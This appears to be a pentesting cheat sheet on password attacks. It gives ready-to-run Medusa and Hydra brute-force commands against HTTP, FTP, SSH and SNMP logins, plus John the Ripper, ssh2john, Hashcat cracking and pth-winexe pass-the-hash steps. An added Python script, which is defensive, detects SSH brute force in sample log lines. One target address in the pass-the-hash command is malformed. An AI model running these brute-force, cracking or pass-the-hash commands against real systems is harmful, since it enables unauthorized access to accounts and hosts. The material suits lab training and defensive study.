On Cyber War
Password attacks

Wordlists live under /usr/share/wordlists (rockyou.txt, used in the examples below, is there).

Medusa

Brute force HTTP basic authentication (-M http selects the module, -m DIR:/admin the protected directory, -T the number of parallel connections).

medusa -h 10.11.1.219 -u admin -P password.txt -M http -m DIR:/admin -T 10

Hydra

Hydra can brute force many services; the service name is the last argument, optionally followed by a path.

hydra -P password.txt -v 10.11.1.210 snmp
hydra -l admin -P password.txt -v 122.168.31.219 ftp
hydra -l root -P password.txt 10.11.1.219 ssh
hydra -L users.txt -P password.txt 10.10.219.253 www-get /admin

Brute force HTTP POST login forms

Format: hydra -L <path to user wordlist> -P <path to password wordlist> <IP Address> http-post-form "<Login Page>:<Request Body>:<Error Message>"

The request body uses ^USER^ and ^PASS^ as placeholders that Hydra fills from the wordlists; the error message is the string Hydra looks for in the response to recognise a failed attempt.

Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
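Every guess made by the Medusa and Hydra commands above lands as a failed authentication in the target's logs, which is what a defender keys on. The following Python script is an added example, not part of the original page: it parses OpenSSH auth.log-style lines, flags any source address with five or more failed logins inside a 60-second window, and records whether a successful login from that address followed the burst, the pattern a guessed password produces. The log lines, host name, addresses and thresholds are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in OpenSSH auth.log style (not real log data).
SAMPLE_LOG = """\
Mar 10 12:00:01 web01 sshd[2101]: Failed password for root from 203.0.113.7 port 51234 ssh2
Mar 10 12:00:02 web01 sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51236 ssh2
Mar 10 12:00:02 web01 sshd[2105]: Failed password for root from 203.0.113.7 port 51238 ssh2
Mar 10 12:00:03 web01 sshd[2107]: Failed password for root from 203.0.113.7 port 51240 ssh2
Mar 10 12:00:04 web01 sshd[2109]: Failed password for root from 203.0.113.7 port 51242 ssh2
Mar 10 12:00:05 web01 sshd[2111]: Accepted password for root from 203.0.113.7 port 51244 ssh2
Mar 10 12:05:00 web01 sshd[2201]: Failed password for alice from 198.51.100.4 port 40001 ssh2
Mar 10 12:20:00 web01 sshd[2301]: Accepted publickey for alice from 198.51.100.4 port 40002 ssh2
"""

# Matches both "Failed password for root from ..." and
# "Failed password for invalid user admin from ..." as well as "Accepted ..." lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse(line, year=2024):
    """Return (timestamp, result, user, ip) for an auth line, or None if it is not one.
    Syslog timestamps carry no year, so the caller supplies it (assumed 2024 here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Sliding-window detector: an IP is reported once it reaches `threshold`
    failures within `window_seconds`. A later successful login from the same IP
    is attached to the finding, since that is the case worth paging on."""
    events = [e for e in (parse(l) for l in log_text.splitlines()) if e]
    events.sort()
    recent_failures = defaultdict(list)  # ip -> timestamps still inside the window
    findings = {}
    for ts, result, user, ip in events:
        if result == "Failed":
            window = recent_failures[ip]
            window.append(ts)
            # Drop failures that have aged out of the window.
            while (ts - window[0]).total_seconds() > window_seconds:
                window.pop(0)
            if len(window) >= threshold and ip not in findings:
                findings[ip] = {
                    "failures": len(window),
                    "first": window[0],
                    "last": ts,
                    "success_after": None,
                }
        elif result == "Accepted" and ip in findings and findings[ip]["success_after"] is None:
            findings[ip]["success_after"] = (ts, user)
    return findings


if __name__ == "__main__":
    for ip, f in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {f['failures']} failures between {f['first']:%H:%M:%S} and {f['last']:%H:%M:%S}")
        if f["success_after"]:
            ts, user = f["success_after"]
            print(f"  successful login as {user!r} at {ts:%H:%M:%S} -> likely guessed password")
```

The threshold and window are deliberately low so the sample trips them; on a real host tune them to the normal failure rate, and treat a success that follows a burst as an incident rather than a noisy alert.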

John the Ripper

john <hash.txt> --wordlist=/usr/share/wordlists/rockyou.txt

SSH keys

To crack the passphrase on an SSH private key, convert the key into a hash John understands with ssh2john, then run John against that hash file as above.

python ssh2john.py id_rsa > id_rsa.hash

Hashcat

hashcat -m (mode) -a 0 hash.txt Pass.txt

The -m value is the hash type; look it up in the example hashes table on the Hashcat wiki:

https://hashcat.net/wiki/doku.php?id=example_hashes

Passing the hash (Windows)

Create an environment variable SMBHASH containing the hash we want to pass:

export SMBHASH=hashvalue

Then use pth-winexe to authenticate and run a command on the target:

pth-winexe -U administrator% //10.11.0.1.76 cmd

Last updated 2 years ago